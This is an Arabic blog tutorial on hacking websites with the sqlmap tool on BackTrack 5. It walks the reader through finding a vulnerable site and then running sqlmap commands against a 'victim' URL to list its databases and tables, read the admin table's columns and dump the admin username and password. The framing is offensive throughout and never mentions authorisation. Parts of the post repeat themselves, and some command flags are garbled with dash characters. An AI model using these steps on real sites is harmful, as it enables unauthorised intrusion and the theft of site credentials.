السلام عليكم ورحمة الله وبركاته
اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5
1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !
2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQsiWcCekSY1hF_YPn6RKjdFyD_Fl8zeeGExwtxMVnBe-CMizDbQ0GehVOp1GVyT0-sFlYAWKp-WuV86sFYma1XKdRb3XLRoys64iKu9c9p-cKlS_wI3_11Pxdye9-fcqN3mYOi3MKgI/s400/sql-map-2-_thumb1.png)
3. الآن اكتب هذا الأمر واضغط على enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW_CCfsaqNkXzuSlRDX2CUNsuqR3V453t-f8zwssTETu4iVfrubwIP5My_eGD2GC03lIenjrUtW9ugMKsfWk0ejzR4sNmwNJ0f4T3spuBQtWG2ZVxpXyYRceffINCHyy_3IkKnm6NZkfM/s400/sql-map-3_thumb1.png)
حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB1vSwHaxj0fjjID1c_a89SOTON3lSg9tH46dZssT-HjRTGhW6UEeglPlpTPVFs0IdT0Urdvp1XL841ZmYoFIp8ANsv49332Bqk9YvyCH_6CcO0f57B_4PwBMv-IRRDcj0lMSa6x80Q1c/s400/sql-map-4_thumb2.png)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTM0BKFDCnVmXuAAwDsz9wT3AIx9XYJVqYDfS4IpDKru05lKV2Z4bV0Czz9-QOeu0kOifbTyUdKME8nUBXh8tLvZ_KAL3slzHdwge-NIh3DexayombwtWjeDo0Wo-gUeY_83ELSVoK_uo/s400/sql-map-5_thumb2.png)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBJdQfTvTQbB45BWjt1n7qW48yUazZw7p3MGx800mg8TkqS1R-e5tyfS_WS8ZpTCOE-uZUivU-KpNpqjKuKO-RD4UvUUMONsAbZ7ttmlXtammtAPJeWPXHIYiJRgXy2qRA9YOhsThFMzM/s400/sql+map+9_thumb%5B1%5D.png)
4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW_CCfsaqNkXzuSlRDX2CUNsuqR3V453t-f8zwssTETu4iVfrubwIP5My_eGD2GC03lIenjrUtW9ugMKsfWk0ejzR4sNmwNJ0f4T3spuBQtWG2ZVxpXyYRceffINCHyy_3IkKnm6NZkfM/s400/sql-map-3_thumb1.png)
حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.
5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB1vSwHaxj0fjjID1c_a89SOTON3lSg9tH46dZssT-HjRTGhW6UEeglPlpTPVFs0IdT0Urdvp1XL841ZmYoFIp8ANsv49332Bqk9YvyCH_6CcO0f57B_4PwBMv-IRRDcj0lMSa6x80Q1c/s400/sql-map-4_thumb2.png)
7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTM0BKFDCnVmXuAAwDsz9wT3AIx9XYJVqYDfS4IpDKru05lKV2Z4bV0Czz9-QOeu0kOifbTyUdKME8nUBXh8tLvZ_KAL3slzHdwge-NIh3DexayombwtWjeDo0Wo-gUeY_83ELSVoK_uo/s400/sql-map-5_thumb2.png)
8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBJdQfTvTQbB45BWjt1n7qW48yUazZw7p3MGx800mg8TkqS1R-e5tyfS_WS8ZpTCOE-uZUivU-KpNpqjKuKO-RD4UvUUMONsAbZ7ttmlXtammtAPJeWPXHIYiJRgXy2qRA9YOhsThFMzM/s400/sql+map+9_thumb%5B1%5D.png)
0 التعليقات:
إرسال تعليق